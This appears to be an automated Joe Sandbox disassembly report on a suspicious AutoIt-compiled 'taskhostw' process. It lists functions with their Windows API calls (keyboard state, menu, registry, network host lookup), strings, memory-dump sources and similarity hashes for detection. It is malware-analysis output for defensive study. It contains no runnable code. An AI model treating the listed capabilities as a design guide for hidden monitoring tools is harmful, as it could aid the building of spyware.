API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 26c48de51ab7e6c585676af1494404da4df13413c6252bab18642e50384132dc
Instruction ID: 1ffae143655b0f720da14851165efe857fb008480d6c641b9023bd2d2d41c9e9
Opcode Fuzzy Hash: 26c48de51ab7e6c585676af1494404da4df13413c6252bab18642e50384132dc
Instruction Fuzzy Hash: 5C51A1715183059FC700EF20C8919AAB7F9FFA8718F40496DF896972A1DB31EE46CB52

Function 0023C216 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B2612: GetWindowLongW.USER32(?,000000EB), ref: 001B2623

PostMessageW.USER32 ref: 0023C266
GetFocus.USER32(?,?,?,?), ref: 0023C276
GetDlgCtrlID.USER32 ref: 0023C281
_memset.LIBCMT ref: 0023C3AC
GetMenuItemInfoW.USER32 ref: 0023C3D7
GetMenuItemCount.USER32(?), ref: 0023C3F7
GetMenuItemID.USER32(?,00000000), ref: 0023C40A
GetMenuItemInfoW.USER32 ref: 0023C43E
GetMenuItemInfoW.USER32 ref: 0023C486
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0023C4BE
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0023C4F3

Strings

0, xrefs: 0023C3A4

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 7b91ba0a1c5b0e78be96d59f71aa3c3bf27152f31523b96888ed1ff317945a34
Instruction ID: 68e3b1aecf2e0fe955bfb4f823a3b2933e6d97fa8f5eff840c5b5d753dca6fe6
Opcode Fuzzy Hash: 7b91ba0a1c5b0e78be96d59f71aa3c3bf27152f31523b96888ed1ff317945a34
Instruction Fuzzy Hash: 72818FB1618312AFD710DF14D994A7BBBE8FF88314F20452EFA95A7291C770D815CBA2

Function 001B6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 001D0AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,001B6C6C,?,00008000), ref: 001D0AF3

Part of subcall function 001B48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001B48A1,?,?,001B37C0,?), ref: 001B48CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 001B6D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 001B6E5A

Part of subcall function 001B59CD: _wcscpy.LIBCMT ref: 001B5A05

Part of subcall function 001D37BD: _iswctype.LIBCMT ref: 001D37C5

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 001EE7EF
Bad directive syntax error, xrefs: 001EEAF6
#include depth exceeded. Make sure there are no recursive includes, xrefs: 001EE77A
AU3!, xrefs: 001B6CC1
EA06, xrefs: 001EE7AB
Unterminated string, xrefs: 001EEB3D
Error opening the file, xrefs: 001EE796, 001EE811

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: fcacfdcb9ee9812928e95829dc21b3edee68969e0652eefddb350382bd434d61
Instruction ID: a3de7b22e01ebb698613e26eadc4af1a3edf9205decb44ce7a34fd5260ca4cb3
Opcode Fuzzy Hash: fcacfdcb9ee9812928e95829dc21b3edee68969e0652eefddb350382bd434d61
Instruction Fuzzy Hash: 55029D711087819FC724EF24C881AAFBBE5BFE9314F14491DF496972A2DB30D949CB52

Function 001B45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001B45F9
GetMenuItemCount.USER32(00275890), ref: 001ED6FD
GetMenuItemCount.USER32(00275890), ref: 001ED7AD
GetCursorPos.USER32(?), ref: 001ED7F1
SetForegroundWindow.USER32(00000000), ref: 001ED7FA
TrackPopupMenuEx.USER32 ref: 001ED80D
PostMessageW.USER32 ref: 001ED819

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: d9b57bdd7704bd1f9ef4e2b33b44dfabcdf288f097955724117db2a9f822944c
Instruction ID: 39a506915a6ea03e07d9bf44fbe4608171f28518fa17b29520e743d6e0ce6cc2
Opcode Fuzzy Hash: d9b57bdd7704bd1f9ef4e2b33b44dfabcdf288f097955724117db2a9f822944c
Instruction Fuzzy Hash: 58710370A00645BFEB249F55EC89FAABF65FF09368F204216F519A61E1C7B16C60CB50

Function 002289C0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002289EC
CoInitialize.OLE32(00000000), ref: 00228A19
CoUninitialize.OLE32 ref: 00228A23
GetRunningObjectTable.OLE32(00000000,?), ref: 00228B23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00228C50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00242C0C), ref: 00228C84
CoGetObject.OLE32(?,00000000,00242C0C,?), ref: 00228CA7
SetErrorMode.KERNEL32(00000000), ref: 00228CBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00228D3A
VariantClear.OLEAUT32(?), ref: 00228D4A

Strings

,,$, xrefs: 002289D6

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,$
API String ID: 2395222682-3408194025
Opcode ID: 4fc3913d2ddb058bd7836da949dd411258f8cd8db51e54cf0612e1634688013c
Instruction ID: 5e805cfb99279db8fed6548ea4a31481f1de470fb1316ec7b2f2b453cff81798
Opcode Fuzzy Hash: 4fc3913d2ddb058bd7836da949dd411258f8cd8db51e54cf0612e1634688013c
Instruction Fuzzy Hash: BEC155B0618315AFD704DFA4D88492AB7E9FF88348F00492DF58ADB261DB71ED06CB52

Function 00230EA5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00230EBC

Strings

HKEY_CLASSES_ROOT, xrefs: 00230F4F
HKEY_CURRENT_USER, xrefs: 00230F9B
HKEY_USERS, xrefs: 00230FBD
HKCR, xrefs: 00230F64
HKU, xrefs: 00230FCE
HKLM, xrefs: 00230F3A
HKCC, xrefs: 00230F8A
HKEY_LOCAL_MACHINE, xrefs: 00230F25
HKEY_CURRENT_CONFIG, xrefs: 00230F79
HKCU, xrefs: 00230FAC

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 8e4d49f89e6333d468da79918a14f497631c021f03502f71f9c29ab8ccb5a30b
Instruction ID: 2be7e506fbf0cf6e313ae12990096166e25c44a23bba3365d79902b47f090d22
Opcode Fuzzy Hash: 8e4d49f89e6333d468da79918a14f497631c021f03502f71f9c29ab8ccb5a30b
Instruction Fuzzy Hash: 85413B7013024A8BCF25EF10DCE1AEE3728AF65344F544465FC515B692DF35A9BACBA0

Function 002146F8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00214713
gethostname.WSOCK32(?,00000100), ref: 0021472D
gethostbyname.WSOCK32(?), ref: 0021473A
_wcscpy.LIBCMT ref: 00214762
_memmove.LIBCMT ref: 00214775
inet_ntoa.WSOCK32(?), ref: 00214780
_strcat.LIBCMT ref: 0021478E
_wcscpy.LIBCMT ref: 002147A5
WSACleanup.WSOCK32 ref: 002147B3
_wcscpy.LIBCMT ref: 002147C1

Strings

0.0.0.0, xrefs: 0021475C

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 75cc73fb04b5c9eb8545ca74a1e88c02baad8028fc5f9d58b621b953cf29e1a0
Instruction ID: 2ddb613e58c3900d1651b0c57efc4475dec0920f0427cd4cf8976a33ae3f8b59
Opcode Fuzzy Hash: 75cc73fb04b5c9eb8545ca74a1e88c02baad8028fc5f9d58b621b953cf29e1a0
Instruction Fuzzy Hash: 5C11E731914115ABDB25BB20FD4AEEAB7FCDF62711F0401B6F40996191EF709AD286A0

Function 02A55E3C Relevance: 18.3, APIs: 12, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 02A55E91
__wcsnicmp.LIBCMT ref: 02A55EA9
__wcsnicmp.LIBCMT ref: 02A55EC1
__wcsnicmp.LIBCMT ref: 02A55ED9
__wcsnicmp.LIBCMT ref: 02A55EF1
__wcsnicmp.LIBCMT ref: 02A55F09
__wcsnicmp.LIBCMT ref: 02A55F21
__wcsnicmp.LIBCMT ref: 02A55F35
__wcsnicmp.LIBCMT ref: 02A55F76
__wcsnicmp.LIBCMT ref: 02A55F8A
__wcsnicmp.LIBCMT ref: 02A55F9E
__wcsnicmp.LIBCMT ref: 02A55FB2

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __wcsnicmp
String ID:
API String ID: 1038674560-0
Opcode ID: 21bf1845f380f627ca9630b9c32677d81d7e08e02c91637065fe8fd2e237a556
Instruction ID: 86a3332449a0f792a9640f5966c2d37ce57b742e1caba5a95a6346afca3a92a4
Opcode Fuzzy Hash: 21bf1845f380f627ca9630b9c32677d81d7e08e02c91637065fe8fd2e237a556
Instruction Fuzzy Hash: 05812370A80725BACB20BB70DD81FAF776AAF15700F540026FD05AA1D1EF74DA45CAA8

Function 0021034D Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 002103C8
SetKeyboardState.USER32(?), ref: 00210433
GetAsyncKeyState.USER32 ref: 00210453
GetKeyState.USER32(000000A0), ref: 0021046A
GetAsyncKeyState.USER32 ref: 00210499
GetKeyState.USER32(000000A1), ref: 002104AA
GetAsyncKeyState.USER32 ref: 002104D6
GetKeyState.USER32(00000011), ref: 002104E4
GetAsyncKeyState.USER32 ref: 0021050D
GetKeyState.USER32(00000012), ref: 0021051B
GetAsyncKeyState.USER32 ref: 00210544
GetKeyState.USER32(0000005B), ref: 00210552

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 72c97785b875165eaa79ddfa14bf096d988372b7c8e1af653c75f25661e5d652
Instruction ID: 282f6890eb14af49094ead7a04013a9c422e0303b4eeb28aaff3058b4980b813
Opcode Fuzzy Hash: 72c97785b875165eaa79ddfa14bf096d988372b7c8e1af653c75f25661e5d652
Instruction Fuzzy Hash: 8051E92092838969FB34DFA084957EEBFF49F21380F4885D995C2561C3DAE49BDCCB61

Function 02AB38DB Relevance: 18.2, APIs: 12, Instructions: 179COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 02AB3941
_wcscmp.LIBCMT ref: 02AB394C
_wcscat.LIBCMT ref: 02AB3962
_wcsstr.LIBCMT ref: 02AB396D
_wcscat.LIBCMT ref: 02AB39D2
_wcscat.LIBCMT ref: 02AB39D9
_wcsncpy.LIBCMT ref: 02AB3A04

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcscat$_wcscmp_wcscpy_wcsncpy_wcsstr
String ID:
API String ID: 3576275495-0
Opcode ID: 73d7e2a36a51b615f4a70796a82e372b4e834be5de16a361a1760331fe4b1594
Instruction ID: df7c22d1932d61f20309943f2247b4efd5155658a44468c5c33f62e6058e3f07
Opcode Fuzzy Hash: 73d7e2a36a51b615f4a70796a82e372b4e834be5de16a361a1760331fe4b1594
Instruction Fuzzy Hash: 0D410472A402047AEB11BB608D86FFF77ADDF45310F1444AAF805E6182EF35A901CBAD

Function 0020C529 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0020C545
GetWindowRect.USER32(00000000,?), ref: 0020C557
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0020C5B5
GetDlgItem.USER32(?,00000002), ref: 0020C5C0
GetWindowRect.USER32(00000000,?), ref: 0020C5D2
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0020C626
GetDlgItem.USER32(?,000003E9), ref: 0020C634
GetWindowRect.USER32(00000000,?), ref: 0020C645
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0020C688
GetDlgItem.USER32(?,000003EA), ref: 0020C696
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0020C6B3
InvalidateRect.USER32(?,00000000,00000001), ref: 0020C6C0

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 0c1e7d01557a90b4641f5612abf7df30433561305c516cd18e7546b0f5e23d41
Instruction ID: ccaf9beb44ed4c6a5feda18ad3b17589cb29dc7786b938428b6cecb9772467da
Opcode Fuzzy Hash: 0c1e7d01557a90b4641f5612abf7df30433561305c516cd18e7546b0f5e23d41
Instruction Fuzzy Hash: 825143B1F10205AFDB18CF69ED89A6EBBB9EB88310F14822DF515D72E1D7709D008B50

Function 001B201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 001B1B41: InvalidateRect.USER32(?,00000000,00000001), ref: 001B1B9A

DestroyWindow.USER32 ref: 001B20D3
KillTimer.USER32 ref: 001B216E
DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,001B16CB,00000000,?,?,001B1AE2,?,?), ref: 001EBE26
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001B16CB,00000000,?,?,001B1AE2,?,?), ref: 001EBE57
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001B16CB,00000000,?,?,001B1AE2,?,?), ref: 001EBE6E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001B16CB,00000000,?,?,001B1AE2,?,?), ref: 001EBE8A
DeleteObject.GDI32(00000000), ref: 001EBE9C

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 511077f5179232e71f5158ef922897a2db752e44368fe010bc55f294329e7b13
Instruction ID: 26d3c7d23a817f8f76edd27b56d40d3511aaea5ee9efd94f9cfcfae3856400b2
Opcode Fuzzy Hash: 511077f5179232e71f5158ef922897a2db752e44368fe010bc55f294329e7b13
Instruction Fuzzy Hash: E3618D31504A50DFCB39AF19E98CBAAB7F1FF40312F50852DE5469A970C3B0A894DF91

Function 001B21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 001B25DB: GetWindowLongW.USER32(?,000000EB), ref: 001B25EC

GetSysColor.USER32(0000000F,?,?,?,?), ref: 001B21D3

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 4e63306681bd6fc82118f6dd4dfe7cfe50605279002b17eb7980854db85a1961
Instruction ID: f2955c0887695755a49fc2bec80d468c82a3273705c12969ea82789948ffacee
Opcode Fuzzy Hash: 4e63306681bd6fc82118f6dd4dfe7cfe50605279002b17eb7980854db85a1961
Instruction Fuzzy Hash: 47419D31400544EBDB255F28FC88BF93B66EB06731F2842A5FDA5CA1E5C7318C86DB61

Function 0021A931 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0021A995
GetDriveTypeW.KERNEL32(00000061,002689A0,00000061), ref: 0021AA5F
_wcscpy.LIBCMT ref: 0021AA89

Strings

unknown, xrefs: 0021AA20
fixed, xrefs: 0021A9DD
cdrom, xrefs: 0021A9B1
removable, xrefs: 0021A9C7
network, xrefs: 0021A9F3
all, xrefs: 0021A99B
ramdisk, xrefs: 0021AA09

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 305872ffb10ffbf9098a5acd945f5d5631eed1e3468e86d4db8fed509a8f7e4f
Instruction ID: 8942a7f81655aa1d2a8cbd4457bdd8d1359d45fa078cf5b498cbd617d401c1f4
Opcode Fuzzy Hash: 305872ffb10ffbf9098a5acd945f5d5631eed1e3468e86d4db8fed509a8f7e4f
Instruction Fuzzy Hash: 6E51CE301293019BC310EF14C9D2AEEB7E9EFA4304F50492DF596972A2DB31DD99CA93

Function 02A76380 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02A763BB

Part of subcall function 02A780A8: __getptd_noexit.LIBCMT ref: 02A780A8

__gmtime64_s.LIBCMT ref: 02A76454
__gmtime64_s.LIBCMT ref: 02A7648A
__gmtime64_s.LIBCMT ref: 02A764A7
__allrem.LIBCMT ref: 02A764FD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A76519
__allrem.LIBCMT ref: 02A76530
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A7654E
__allrem.LIBCMT ref: 02A76565
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A76583
__invoke_watson.LIBCMT ref: 02A765F4

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1c4455a8cabbafb8053031da4900f27aa4d22a0464a805da282a5d848683b4d7
Instruction ID: 34452ce2f71c85a2a3053dea700aac207927513e582d5c8be32ad0529751c78a
Opcode Fuzzy Hash: 1c4455a8cabbafb8053031da4900f27aa4d22a0464a805da282a5d848683b4d7
Instruction Fuzzy Hash: EA712971A40B16ABEB14AF78CD81B6AB7BDAF04B24F14427AE514D7280EF70D940CBD4

Function 001D6F80 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001D6FBB

Part of subcall function 001D8CA8: __getptd_noexit.LIBCMT ref: 001D8CA8

__gmtime64_s.LIBCMT ref: 001D7054
__gmtime64_s.LIBCMT ref: 001D708A
__gmtime64_s.LIBCMT ref: 001D70A7
__allrem.LIBCMT ref: 001D70FD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001D7119
__allrem.LIBCMT ref: 001D7130
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001D714E
__allrem.LIBCMT ref: 001D7165
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001D7183
__invoke_watson.LIBCMT ref: 001D71F4

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: 30119c59d4eea23ae6b1f614d39ee5e51332e4d175cf868a83380415df8d5498
